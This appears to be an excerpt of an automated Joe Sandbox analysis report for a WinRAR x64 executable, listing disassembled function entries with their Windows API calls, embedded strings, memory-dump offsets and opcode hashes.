                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                            • String ID: csm$csm
                                                            • API String ID: 3896166516-3733052814
                                                            • Opcode ID: dff33faf19fa612d00f694886be567677f5714d100c4dc190a560424eb284a65
                                                            • Instruction ID: c21db63c6ff209bba70557490b0a55446cba1d4c569312a286129f1b43605c7f
                                                            • Opcode Fuzzy Hash: dff33faf19fa612d00f694886be567677f5714d100c4dc190a560424eb284a65
                                                            • Instruction Fuzzy Hash: 3951963290824286EB648F15A4C5A6C7790FBA6B8EF144135FACD9B7E5CF3CE4508700
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: ClassCursorLoadRegister
                                                            • String ID: P$RarHtmlClassName
                                                            • API String ID: 1693014935-552670043
                                                            • Opcode ID: 31acbb7b32b518cdaa092c4f1bb6aab95ae06e0d4904f27a47475fa26f19002a
                                                            • Instruction ID: 730da9c73d689c9aab2664d55aaa7af8518ef287a67b009c8a676dabf85c6f3f
                                                            • Opcode Fuzzy Hash: 31acbb7b32b518cdaa092c4f1bb6aab95ae06e0d4904f27a47475fa26f19002a
                                                            • Instruction Fuzzy Hash: 0D013532E14B42CAF7008FA0E8457AD37B8F758759F244138DE986AA18DF788155CB80
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: CapsDeviceRelease
                                                            • String ID:
                                                            • API String ID: 127614599-3916222277
                                                            • Opcode ID: 3835359f8632c3883978aa59da59803a7ae97ae479bf7427c32fe4182829fb3b
                                                            • Instruction ID: 6e4a3037ada7a0ddd18fa2251ac2d38215c480d5440c489bcee001773ff12380
                                                            • Opcode Fuzzy Hash: 3835359f8632c3883978aa59da59803a7ae97ae479bf7427c32fe4182829fb3b
                                                            • Instruction Fuzzy Hash: 9BE0C228B0864182EB0C6BBEF58A83A6361AB4DBD1F166034DA8F83784CE3DD4C44B00
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: FileWrite$ConsoleErrorLastOutput
                                                            • String ID:
                                                            • API String ID: 2718003287-0
                                                            • Opcode ID: a8e3eefb6b4a7bb60a8dfef776a41c730d8024edca4d5e0d56e7037e71f64804
                                                            • Instruction ID: 484225a869ee53cdddfeab911b86e78b9d8b34557171e0ff8e7eafb88376478b
                                                            • Opcode Fuzzy Hash: a8e3eefb6b4a7bb60a8dfef776a41c730d8024edca4d5e0d56e7037e71f64804
                                                            • Instruction Fuzzy Hash: F4D12432F08A8189E720DF65E4416AC37B1FB66799B144276DEDDEBB89DE38D506C300
                                                            APIs
                                                            • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF6C3BCF84B,00000000), ref: 00007FF6C3BCF97C
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF6C3BCF84B,00000000), ref: 00007FF6C3BCFA07
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: ConsoleErrorLastMode
                                                            • String ID:
                                                            • API String ID: 953036326-0
                                                            • Opcode ID: 6764deb9eb99faf6f2fa29ccd02732ebdc0cb7aea93fab3ddd3bfba10ef26be6
                                                            • Instruction ID: 391c362ead836007ca00d615de484d316ff2c5f5b1b4c14b3bb1447c9391c4be
                                                            • Opcode Fuzzy Hash: 6764deb9eb99faf6f2fa29ccd02732ebdc0cb7aea93fab3ddd3bfba10ef26be6
                                                            • Instruction Fuzzy Hash: 8191B332F1865185F770AF65A442ABD6BA0BB66B8AF144179DECEB7685CF3CD442C300
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: File$Create$CloseHandleTime
                                                            • String ID:
                                                            • API String ID: 2287278272-0
                                                            • Opcode ID: b06a088d228a07a3e749a8d415f4d176d172e55972da0638a338fa7bc1e0ff5e
                                                            • Instruction ID: cfb99365dc1f5e5ec8804747f2ee9b69c41033754ab067b6432b0aacb7f98e9b
                                                            • Opcode Fuzzy Hash: b06a088d228a07a3e749a8d415f4d176d172e55972da0638a338fa7bc1e0ff5e
                                                            • Instruction Fuzzy Hash: FD510922B08A4245F9A0DF25E512BBA67A0AFE37E6F440131EDDE977DADE3CD4058740
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: FullNamePath
                                                            • String ID:
                                                            • API String ID: 608056474-0
                                                            • Opcode ID: bc269fee4e50a1ee74e2711acd90c84bb1ed9af7c8df65560ead03289f62de64
                                                            • Instruction ID: f6a67462ecef310bf8c59e5c0a8d9c935d77d8efd86024aa4ceafcbe06d5bf63
                                                            • Opcode Fuzzy Hash: bc269fee4e50a1ee74e2711acd90c84bb1ed9af7c8df65560ead03289f62de64
                                                            • Instruction Fuzzy Hash: 62417815F18A0294FB10EFA1D8539FD6370AFB2786B544035DDDDE7A9AEE2CE8069340
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: CapsDevice$Release
                                                            • String ID:
                                                            • API String ID: 1035833867-0
                                                            • Opcode ID: 063c2fcded254c65569d10fc533311c424a852e6975ab1428a992d71ab73b3cc
                                                            • Instruction ID: 703d2884cbb0a2c3d5bcb37da16c64de00014e67dbce369a4c14868e0bfe6acf
                                                            • Opcode Fuzzy Hash: 063c2fcded254c65569d10fc533311c424a852e6975ab1428a992d71ab73b3cc
                                                            • Instruction Fuzzy Hash: 19E01268F09B0247EF1C6F7AA85A9757390AF6E743F045039C8DEE6350DE3DA1894B40
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: __except_validate_context_record
                                                            • String ID: csm$csm
                                                            • API String ID: 1467352782-3733052814
                                                            • Opcode ID: ee578b2482a540c51527f164a6e0fed1b565d6d81eec71688779eae399c326ed
                                                            • Instruction ID: 48f16123a5dc3c577298bf073a88661e199cf00191825eb800b7b13227a59426
                                                            • Opcode Fuzzy Hash: ee578b2482a540c51527f164a6e0fed1b565d6d81eec71688779eae399c326ed
                                                            • Instruction Fuzzy Hash: D471E57250868186DB618F26E081B7D7BA0FB66B8EF188131EECDAB695DF3CD451C740
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: CreateFrameInfo__except_validate_context_record
                                                            • String ID: csm
                                                            • API String ID: 2558813199-1018135373
                                                            • Opcode ID: 6172443f4aac5bc55d05b3391ceaf8516a59a20f4413852be442e068f4ee1a28
                                                            • Instruction ID: 15f21c86e9751a777b03c082769ebb70e19e771bbc8bf8678c5a934ae46dd998
                                                            • Opcode Fuzzy Hash: 6172443f4aac5bc55d05b3391ceaf8516a59a20f4413852be442e068f4ee1a28
                                                            • Instruction Fuzzy Hash: 2251917661874187E660EF16E482A6E77A4FB9ABA5F000134EBCD9BB55CF3CE450CB40
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastWrite
                                                            • String ID: U
                                                            • API String ID: 442123175-4171548499
                                                            • Opcode ID: f32195ae518fd65f4f3b1012928870cbf467e7821a135e261eae2b4b3a68d128
                                                            • Instruction ID: b805c400260e131f80c843456c1e4aa76e2f250a05bd1a0788e51e0b0907aac0
                                                            • Opcode Fuzzy Hash: f32195ae518fd65f4f3b1012928870cbf467e7821a135e261eae2b4b3a68d128
                                                            • Instruction Fuzzy Hash: B441B022A18A4182DB20DF25F8457A977A0FBA9785F504031EECDD7798EF3CD441CB40
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: Release
                                                            • String ID:
                                                            • API String ID: 1375353473-3916222277
                                                            • Opcode ID: 63c5ebe95d055cc5ab24ee0dc664498dd510615dc332dc8ef352fedcd7013a9f
                                                            • Instruction ID: 311708b6e6897f6c8a9348345c2820e3347e2c2eb773bf81df6da267dea61386
                                                            • Opcode Fuzzy Hash: 63c5ebe95d055cc5ab24ee0dc664498dd510615dc332dc8ef352fedcd7013a9f
                                                            • Instruction Fuzzy Hash: E0311C3A60874187DA089F26B819A2AB761F79AFD2F405035DD8A93754CF3CD449CB04
                                                            APIs
                                                              • Part of subcall function 00007FF6C3BA85E8: GetProcAddress.KERNEL32(?,?,00000000,00007FF6C3BA88A4), ref: 00007FF6C3BA8615
                                                              • Part of subcall function 00007FF6C3BA85E8: GetProcAddress.KERNEL32(?,?,00000000,00007FF6C3BA88A4), ref: 00007FF6C3BA8629
                                                            • GetCurrentProcessId.KERNEL32 ref: 00007FF6C3BA8919
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$CurrentProcess
                                                            • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                            • API String ID: 2190909847-396321323
                                                            • Opcode ID: 6d8220386a921977bc83dee32e9001b82bf0fdd35c8ad8174e51ed78770c5b4e
                                                            • Instruction ID: 6ae7da72f1f41857684a4fd7e6b81573166caaaa63bb5c51b26f6139e7a86bd2
                                                            • Opcode Fuzzy Hash: 6d8220386a921977bc83dee32e9001b82bf0fdd35c8ad8174e51ed78770c5b4e
                                                            • Instruction Fuzzy Hash: 0021A320A0DF4280FA508F15A8829796B60FF76B96F491235D9DDE3BD4DE3CE506C301
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: Create$EventSemaphore
                                                            • String ID: Thread pool initialization failed.
                                                            • API String ID: 3431467744-2182114853
                                                            • Opcode ID: cf7e847ec42c39c98afed13f61a8aa811440edc33cdc0335b4f5739e4f6cac58
                                                            • Instruction ID: b45fa12b8ef2d1f48410152c9d85b4e2926d7ab754f4e633972a92e3479f0d99
                                                            • Opcode Fuzzy Hash: cf7e847ec42c39c98afed13f61a8aa811440edc33cdc0335b4f5739e4f6cac58
                                                            • Instruction Fuzzy Hash: 45210732B19B4286F718CF25E151BA973A2FBA5706F148034C7ED87285CF7EA065CB40
                                                            APIs
                                                            • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6C3B924E7), ref: 00007FF6C3BBC41C
                                                            • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6C3B924E7), ref: 00007FF6C3BBC462
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFileHeaderRaise
                                                            • String ID: csm
                                                            • API String ID: 2573137834-1018135373
                                                            • Opcode ID: c03d251433d90376995db402b47a83d553daa412ff273ed7f441ff3744a3506c
                                                            • Instruction ID: 4c824cfd689b049484f2b3a5e0d51d4ca6be22ea49978a4e87e48592e132d2ab
                                                            • Opcode Fuzzy Hash: c03d251433d90376995db402b47a83d553daa412ff273ed7f441ff3744a3506c
                                                            • Instruction Fuzzy Hash: 1B116A32608B8182EB208F15F481669BBA4FBD9B99F584230DECD5BB68DF3CD5518B00
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastObjectSingleWait
                                                            • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                            • API String ID: 1211598281-2248577382
                                                            • Opcode ID: 9928445313413648c54120f2c83774c4f876eb100ab0f055dbd8e3c4ab5f68aa
                                                            • Instruction ID: 7d7df563be117dc559dc7bf36209fc522aba1017c53f3c5156a45f9a83ddfe3a
                                                            • Opcode Fuzzy Hash: 9928445313413648c54120f2c83774c4f876eb100ab0f055dbd8e3c4ab5f68aa
                                                            • Instruction Fuzzy Hash: 5CE01261E28A0281F600AF35AC939B42221AF737B2F905330E0FDE15E59F6CA64A8740